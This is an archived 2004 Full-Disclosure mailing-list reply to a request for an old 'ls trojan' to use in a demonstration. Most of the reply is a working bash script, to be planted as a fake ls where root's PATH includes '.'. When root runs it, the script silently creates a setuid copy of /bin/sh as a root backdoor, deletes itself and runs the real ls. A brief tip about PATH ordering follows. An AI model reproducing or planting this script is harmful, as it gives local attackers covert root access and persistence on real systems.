Re: [Full-Disclosure] Old LS Trojan?

From: Andrew Farmer (
Date: 12/01/04

  • Next message: Kyle Maxwell: "Re: [Full-Disclosure] who is the jackass?"
    To: "David S. Morgan" <>
    Date: Wed, 1 Dec 2004 14:27:40 -0800

    On 01 Dec 2004, at 12:11, David S. Morgan wrote:
    > I am looking for an old LS trojan, with trojan being a misnomer.
    > Essentially, the scinario is that the admin (root) has a . (dot) in
    > his path. The bad-user knows this, and has crafted an LS shell script
    > (the part that I can't find) that essentially copies /sbin/sh to a
    > hidden directory and then performs some suid majik to make the sh run
    > as if they were root, without needing the root password. The file
    > then removes itself and does the real version of ls.
    > Does anyone remember this one, and have the ls script anywhere? I
    > would like to use it in a demonstration. I know that this has
    > probobly been fixed in various ways, but I have "old Unixes" for just
    > such occasions.

    Probably something along the lines of:
    > #!/bin/bash
    > [ `whoami` = root ] || exit
    > cp /bin/sh /bin/suid-sh
    > chmod +s /bin/suid-sh
    > rm $0
    > exec /bin/ls $*

    Note that this would only run if your $PATH _begins_ with '.' - if
    you're going to put '.' in your $PATH, put it _last_.


    Full-Disclosure - We believe in it.

  • Next message: Kyle Maxwell: "Re: [Full-Disclosure] who is the jackass?"